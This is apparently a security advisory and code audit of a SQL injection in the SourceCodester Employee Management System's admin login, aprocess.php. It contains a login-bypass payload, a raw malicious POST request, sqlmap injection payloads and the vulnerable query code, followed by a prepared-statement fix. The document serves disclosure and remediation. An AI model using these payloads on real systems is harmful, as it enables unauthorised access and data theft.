PHP Code Audit: Employee Management System aprocess.php SQL Injection
source link: https://bewhale.github.io/post/PHP%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1%E2%80%94Employee%20Management%20System%20aprocess.php%20SQL%20Injection/
SourceCodester Employee Management System aprocess.php SQL Injection
Vendor Homepage:
https://www.sourcecodester.com/php/14432/employee-management-system-using-php.html
Source Code Download:
https://www.sourcecodester.com/sites/default/files/download/razormist/employee-management-system.zip
Proof of Concept
Step 1: Open the URL http://127.0.0.1/ems/alogin.html
Step 2: Enter the payload admin' or 1 # in the Email field and anything in the Password field
Step 3: The login succeeds
Malicious Request
POST /ems/process/aprocess.php HTTP/1.1
Host: 127.0.0.1
Content-Length: 40
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.81 Safari/537.36 Edg/104.0.1293.47
Referer: http://192.168.88.195/ems/alogin.html
Accept-Encoding: gzip, deflate
Connection: close

mailuid=admin' or 1 #&pwd=123&login-submit=Login
Sqlmap output
Parameter: mailuid (POST)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
Payload: mailuid=-6002' OR 3766=3766#&pwd=123&login-submit=Login
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: mailuid=admin' AND (SELECT 4206 FROM(SELECT COUNT(*),CONCAT(0x71627a7671,(SELECT (ELT(4206=4206,1))),0x7176786a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- sPJa&pwd=123&login-submit=Login
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: mailuid=admin' AND (SELECT 1085 FROM (SELECT(SLEEP(5)))gGqt)-- XrcV&pwd=123&login-submit=Login
/process/aprocess.php, lines 5-12:
$email = $_POST['mailuid'];      // user input taken straight from the POST body, no validation
$password = $_POST['pwd'];
// Both values are concatenated directly into the query string, so a single quote in
// mailuid ends the string literal and the rest of the input becomes SQL
$sql = "SELECT * from `alogin` WHERE email = '$email' AND password = '$password'";
//echo "$sql";
$result = mysqli_query($conn, $sql);   // executed without escaping or parameter binding
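With the payload from the proof of concept, the concatenation above produces SELECT * from `alogin` WHERE email = 'admin' or 1 #' AND password = '123', so the password check is commented out and the OR 1 makes the WHERE clause true for every row. The fix is to stop building SQL from strings. The following is an added example of a hardened replacement for lines 5-12, not code from the SourceCodester project; it reuses the $conn handle and the alogin table and email/password column names shown in the vulnerable snippet, and assumes the stored password is a password_hash() value rather than plaintext (the original compares plaintext inside the query).

```php
<?php
// Added example: hardened login handler for process/aprocess.php.
// Assumptions: $conn is the project's mysqli connection (established in an include
// not shown on the page), and alogin.password holds password_hash() output.

function authenticate_admin(mysqli $conn, string $email, string $password): ?array
{
    // Prepared statement: the email is bound as a parameter, so the value
    // admin' or 1 # is compared literally against the column instead of
    // being parsed as SQL. The password is deliberately not part of the query.
    $stmt = $conn->prepare("SELECT * FROM `alogin` WHERE email = ? LIMIT 1");
    if ($stmt === false) {
        // Treat a failed prepare as an authentication failure rather than falling
        // back to string concatenation.
        return null;
    }
    $stmt->bind_param('s', $email);
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc();   // requires mysqlnd; use bind_result() otherwise
    $stmt->close();

    if ($row === null) {
        return null;
    }
    // Constant-time hash comparison; a wrong password returns null just like an
    // unknown email, so the two failure cases are not distinguishable to the client.
    if (!password_verify($password, $row['password'])) {
        return null;
    }
    return $row;
}

// Replacement for the original lines 5-12 of process/aprocess.php.
$email    = $_POST['mailuid'] ?? '';
$password = $_POST['pwd'] ?? '';

$admin = authenticate_admin($conn, $email, $password);
if ($admin === null) {
    // Assumed redirect target; the original page does not show the failure path.
    header('Location: ../alogin.html?error=1');
    exit;
}
// Success: continue with the project's own session setup here.
```

Under this version every one of the sqlmap payloads above (boolean-based, FLOOR error-based, SLEEP time-based) is sent to MySQL as an opaque string value for the email parameter and never reaches the parser as SQL, so the injection points on mailuid and pwd both disappear. Migrating existing plaintext rows to password_hash() output is a separate one-time step that the snippet assumes has already been done.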